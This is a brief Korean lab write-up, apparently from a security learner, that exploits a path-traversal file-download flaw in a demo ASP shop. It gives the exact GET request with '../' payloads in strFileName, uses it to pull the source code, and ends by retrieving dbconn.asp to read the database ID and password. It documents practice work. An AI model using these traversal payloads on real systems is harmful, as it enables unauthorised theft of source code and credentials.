1) DB 와 연동되는 부분 찾아서 소스코드 다운로드
게시글 작성에서 submit 하면 DB에 들어갈 것이기 때문에 해당 부분 요청 추출
shop_board_write_ok.asp로 전송하는 것 확인
2) 다운로드 취약점 이용하여 해당 소스코드 다운로드 시도
-
shop_board_write_ok.asp
500 Internal Server Error -
../shop_board_write_ok.asp
200 ok
3) 요청 파라미터 변경하여 해당 소스코드 다운로드
GET /demoshop/shop_board/shop_download.asp?strFileName=../shop_board_write_ok.asp&f_path=upload_file- 소스코드 확인
../admin/dbconn.asp 파일 확인
파일 이름을 보고 db와 연결하는 파일이라고 추정
4) 해당 파일 다운로드 시도
-
../admin/dbconn
500 Internal Server Error -
../../admin/dbconn
200 ok
5) dbconn 파일 다운로드 및 확인
- DB 접속정보 (ID/PW) 확인
정보보안 꿈나무